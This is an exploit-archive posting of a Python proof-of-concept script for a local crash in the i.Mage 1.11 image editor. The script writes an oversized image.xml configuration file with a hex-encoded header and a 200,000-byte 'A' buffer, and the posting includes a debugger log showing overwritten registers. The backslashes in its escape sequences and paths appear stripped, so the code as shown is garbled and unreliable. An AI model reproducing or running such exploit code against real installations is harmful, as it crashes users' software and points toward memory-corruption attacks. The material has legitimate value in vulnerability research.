Home / exploitsPDF  

i.Mage 1.11 Local Crash Proof Of Concept

Posted on 07 November 2014

#!/usr/bin/python
#Exploit Title:i.Mage Local Crash Poc
#Homepage:http://www.memecode.com/image.php
#Software Link:http://sourceforge.net/projects/image-editor/files/i.mage-win32-v111.exe/download
#Version:i.i.Mage v1.11 (Win32 Release)
#Description:i.Mage is a small and fast graphics editor slanted towards quite and easy pixel editing...
#Tested on:Win7 32bit EN-Ultimate
#Exploit Author: metacom
#Date:26.10.2014
'''
Immunity Debugger Log data
Address=77B85FBD
Message=[17:21:47] Access violation when reading [41414145]

EAX 01354078 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01374F10
ESP 0012F810
EBP 0012F838
ESI 01354070 ASCII "AAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 003A0000
EIP 77B85FBD ntdll.77B85FBD'''
print "
[*]Vulnerable Created image.xml!"
print "[*]Copy image.xml to C:Program FilesMemecodei.Mage"
print "[*]Start i.Mage"
print "[*]------------------------------------------------"

poc="x41" * 200000
header = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20x65x6ex63x6fx64x69x6ex67x3dx22"
header += "x55x54x46x2dx38x22x20x3fx3ex0ax3cx4fx70x74x69x6fx6ex73x20x45x72x61x73x65x57x69x64x74x68x3d"
header += "x22x31x30x22x0ax09x20x45x72x61x73x65x41x6dx6fx75x6ex74x3dx22x32x35x35x22x0ax09x20x44x73x70"
header += "x47x72x69x64x3dx22x31x22x0ax09x20x54x6fx6fx6cx4fx70x65x6ex3dx22x30x22x0ax09x20x41x6ex67x6c"
header += "x65x3dx22x30x22x0ax09x20x50x6fx73x3dx22x37x31x37x2cx33x34x30x2cx31x31x31x37x2cx36x34x30x22"
header += "x0ax09x20x45x6ex61x62x6cx65x64x55x6ex64x6fx3dx22x31x22x0ax09x20x46x69x6cx6cx4fx62x6ax65x63"
header += "x74x73x3dx22x31x22x0ax09x20x54x72x61x6ex73x70x61x72x65x6ex74x50x61x73x74x65x3dx22x30x22x0a"
header += "x09x20x4fx70x65x72x61x74x6fx72x3dx22x30x22x0ax09x20x41x6cx70x68x61x3dx22x32x35x35x22x0ax09"
header += "x20x53x70x6cx69x74x74x65x72x50x6fx73x3dx22x32x35x30x22x3ex0ax09x3cx4dx72x75x20x49x74x65x6d"
header += "x73x3dx22x30x22x0ax09x09x20x49x74x65x6dx30x3dx22x0a" + poc

footer = "x22x20x2fx3ex0ax3cx2fx4fx70x74x69x6fx6ex73x3ex0a"

payload=header + footer
writeFile = open ("image.xml", "w")
writeFile.write( payload )
writeFile.close()

 

TOP

Malware :

Exploits :